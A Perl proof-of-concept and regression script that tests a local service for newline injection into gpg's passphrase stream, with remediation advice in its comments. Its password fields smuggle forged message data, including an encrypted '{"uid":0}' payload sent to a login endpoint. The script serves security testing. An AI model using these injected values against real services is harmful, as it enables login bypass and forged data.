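#!/usr/bin/env perl
#
# Demonstration/regression script for newline injection into gpg's
# passphrase channel, run against a local test service on localhost:5000.
#
# Every gpg invocation below uses "--passphrase-fd 0": gpg takes the first
# line of stdin as the passphrase and treats the rest of stdin as the message.
# A value that is meant to be "just a password" but contains "\n" therefore
# also supplies message data.
# NOTE(review): this script assumes the service feeds the submitted password
# to gpg in the same way -- confirm against the service code.
#
# Remediation on the service side: reject CR/LF in passphrases, and hand the
# passphrase to gpg on a descriptor of its own (--passphrase-fd N with N other
# than the data stream, or --passphrase-file) so passphrase and message never
# share a channel.
use strict;
use warnings;

use Mojo::UserAgent;
use IPC::Open2;

# POST %parameters as a form to the local test service and return the raw
# response body. $endpoint is the path below http://localhost:5000/.
sub post {
    my ($endpoint, %parameters) = @_;

    my $ua  = Mojo::UserAgent->new;
    my $res = $ua->post(
        "http://localhost:5000/$endpoint" => form => {%parameters}
    )->result;

    return $res->body;
}

# Shared gpg options. The home directory is a scratch location under /tmp;
# create it privately (mode 0700) before running so other local users cannot
# tamper with it.
my $gpg_cmd = q(/usr/bin/env gpg --pinentry-mode loopback --status-fd 2 --no-tty --no-verbose --fixed-list-mode --batch --with-colons --homedir /tmp/gpg --passphrase-fd 0);

# Build an armored, symmetrically encrypted message locally. Line one of the
# echoed text ("boom") is consumed as the passphrase; the JSON on line two is
# the plaintext that gets encrypted.
my $msg = qx(echo "boom\n{\\"uid\\":0}" | $gpg_cmd --symmetric --armor);
die "gpg --symmetric failed (wait status $?)\n"
    if $? != 0 || !defined $msg || $msg eq '';

# decrypt vulnerability
# The password field carries a passphrase line followed by the message built
# above. A service that validates input correctly should refuse this request;
# the response body is printed so the outcome can be inspected.
my $decrypted = post(
    'login',
    username => "harmless_user",
    password => "boom\n$msg",
);
warn "/login output: $decrypted\n";

# encrypt vulnerability
# Same pattern on the encryption endpoint: everything after the newline in
# the password field is data the caller should not be able to supply.
my $encrypted = post(
    'encryption_as_a_service',
    password => "s3cret\nOh yes I can change it",
);

# Decrypt the returned ciphertext locally with the passphrase line that was
# sent, to see which plaintext the service actually encrypted.
my $pid = open2(my $gpg_out, my $gpg_in, qq($gpg_cmd -d));
print {$gpg_in} "s3cret\n$encrypted";
close($gpg_in);

# Only the first line of the decrypted output is read, as in the original.
my $plaintext = <$gpg_out>;
$plaintext = '' unless defined $plaintext;
close($gpg_out);

waitpid($pid, 0);
warn "gpg -d exited with wait status $?\n" if $? != 0;

warn "/encryption_as_a_service output: $plaintext\n";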